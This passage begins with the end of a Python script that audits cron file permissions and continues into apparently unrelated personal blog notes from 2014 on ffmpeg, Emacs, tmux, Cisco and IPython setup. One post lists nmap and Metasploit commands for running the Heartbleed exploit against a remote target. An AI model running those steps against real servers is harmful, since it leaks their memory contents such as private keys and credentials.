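                continue  # dangling symlink or entry removed meanwhile
            problems = write_problems(st, trusted_uid, trusted_gid)
            if problems:
                findings.append((path, problems))
    return findings


def demo():
    """Audit a constructed tree named after the files in the quoted
    warnings: one script with corrected permissions, one still writable.
    The current user stands in for root so this runs unprivileged."""
    with tempfile.TemporaryDirectory() as root:
        hourly = os.path.join(root, "cron.hourly")
        os.mkdir(hourly)
        os.chmod(hourly, 0o755)
        for name, mode in (("mgmtlicensestatus", 0o755),
                           ("webalizer", 0o757)):
            path = os.path.join(hourly, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        found = audit_cron(root, trusted_uid=os.getuid(),
                           trusted_gid=os.getgid())
        return [(os.path.basename(p), probs) for p, probs in found]


if __name__ == "__main__":
    for path, problems in audit_cron():
        print(path, ", ".join(problems))
```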

Saturday, July 19, 2014

cutting videos with ffmpeg

ffmpeg -i input.mp3 -ss HH:MM:SS -t HH:MM:SS -async 1 output.mp3

ffmpeg -i yoga4A.mp3 -ss 00:05:50 -t 00:23:50 -async 1 yoga4A-2.mp3

Wednesday, June 4, 2014

share binary file via gist using uuencode

@CindyLinz shared me some interesting file via gist paste.

pacman -S sharutils

uuencode input output   # prints the encoded text to stdout; 'output' is the name uudecode will create
# paste the encoded text to a new gist

# download the raw file
uudecode file

Tuesday, May 27, 2014

cisco command notes

ssh user@sw
en             # enable
conf t         # configure terminal
ip http server

sh ru          # show running-config
sh start       # show startup-config


some cheat sheets

Friday, May 16, 2014

Install better Emacs on Mac OS X

Of course, with Homebrew

brew fetch emacs --HEAD --force

brew reinstall emacs --use-git-head --srgb --japanese --with-gnutls --with-cocoa --with-x11 --HEAD --force

brew linkapps emacs

Friday, May 9, 2014

listen to ICRT under linux via mplayer

Listening to ICRT news is a good way to learn English.

Append this to my ~/.bashrc:

# listen to the ICRT radio
icrt () {
    mplayer mms://
}

Tuesday, May 6, 2014

A brief note for ssl-heartbleed exploit on Kali


# <rip> for remote IP (target)

# nmap -sV --script=ssl-heartbleed <rip>
# service postgresql start
# service metasploit start
# msfconsole
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> show options
msf> set RHOSTS <rip>
msf> set verbose true
msf>  exploit

Monday, May 5, 2014

Move .emacs.d to bbatsov/prelude

After a night of Sashimi, I went to my friend @superbil's home.

We talked a lot about emacs and other interesting hacking stuff.

He recommended that I switch my emacs configuration to Bozhidar Batsov's prelude on github.


Back up everything in my .emacs and .emacs.d/ directory.


git clone .emacs.d

Copy prelude-modules.el from sample/ to personal/ .

cp sample/prelude-modules.el personal/

Comment (out) modules I need

Launch my emacs.

(waiting for compiling lisp files)

Make prelude up to date

M-x prelude-update

Restart my emacs.



Other settings

Add @superbil's fix-font-org-mode.el under personal/preload/

Switch to color-theme-sanityinc-tomorrow


github-browse-file mode
switch-window mode
guide-key mode
ace-jump mode
rebind C-h

Big thanks to @superbil (

Friday, April 4, 2014

attach tmux after update

I do pacman -Syu to upgrade my system. After that, I can't attach my tmux session.

$ tmux attach
protocol version mismatch (client 8, server 7)

Here's a hack to attach my session.

$ pgrep tmux
$ /proc/23335/exe attach

Well done!


Monday, March 10, 2014

Extract subtitles from mkv movies

$ sudo pacman -S mkvtoolnix-cli

$ mkvmerge -i 5426d90fb609da53e52fdc31ce1180efb6e29430
File '5426d90fb609da53e52fdc31ce1180efb6e29430': container: Matroska
Track ID 0: audio (PCM)
Track ID 1: video (MPEG-4p10/AVC/h.264)
Track ID 2: subtitles (SubRip/SRT)
Global tags: 1 entries

$ mkvextract tracks 5426d90fb609da53e52fdc31ce1180efb6e29430
Extracting track 2 with the CodecID 'S_TEXT/UTF8' to the file ''. Container format: SRT text subtitles
Progress: 100%


Friday, March 7, 2014

Set up a remote IPython notebook

# setup a password for the notebook
$ ipython
In [1]: from IPython.lib import passwd
In [2]: passwd()
Enter password:
Verify password:
Out[2]: 'sha1:747ba2295030:7bbe79e452b9bb3cae6e66ed738563e18a15462c'

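# self-signed cert: key and certificate both go into mycert.pem, the file certfile points to below
# (2048-bit key, since 1024-bit RSA is too weak for TLS today)
$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mycert.pem -out mycert.pem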

# edit the profile for notebook
$ mkdir ~/.config/ipython/profile_serv/
$ vim ~/.config/ipython/profile_serv/

c = get_config()
c.NotebookApp.password = u'sha1:747ba2295030:7bbe79e452b9bb3cae6e66ed738563e18a15462c'
c.NotebookApp.ip = '*'
c.NotebookApp.open_browser = False
c.NotebookApp.port = 10001
c.NotebookApp.certfile = u'/home/xatier/note/mycert.pem'

# run it!
$ ipython notebook --profile=serv


Wednesday, January 1, 2014

bye, 2013


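The connections between dots keep being born and broken.

While I was in the US, I also often called home on Skype.

Thanks to my senior schoolmate ijsung and Dr. Hwu for the recommendation.
My colleagues were all great; thanks also to the big boss AGK, 娘娘 and the princesses for taking care of me.
Mark, Matthieu, Karoline, Kevin, Tom, Alex, you were all so nice QQ
Before heading back I went to Chicago. It really is a great city.

At the beginning of the year, my senior schoolmate jserv and I held a winter training camp on system programming at 一中.
It was also my first time teaching myself Obj-C iOS programming.

This year I joined my school's OH.

This was probably a year in which I did relatively little hacking.
Thanks to my Plurk friends, my partners in the open source community, and all the hackers.

happy hacking!

for each in NC7U-WTF channel
NC7U-WTF !!! 24x7 happy chatting, pranks, roasting people, sharing dirty stuff   Let's all drop out of school together! Damn!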


xatier 20140101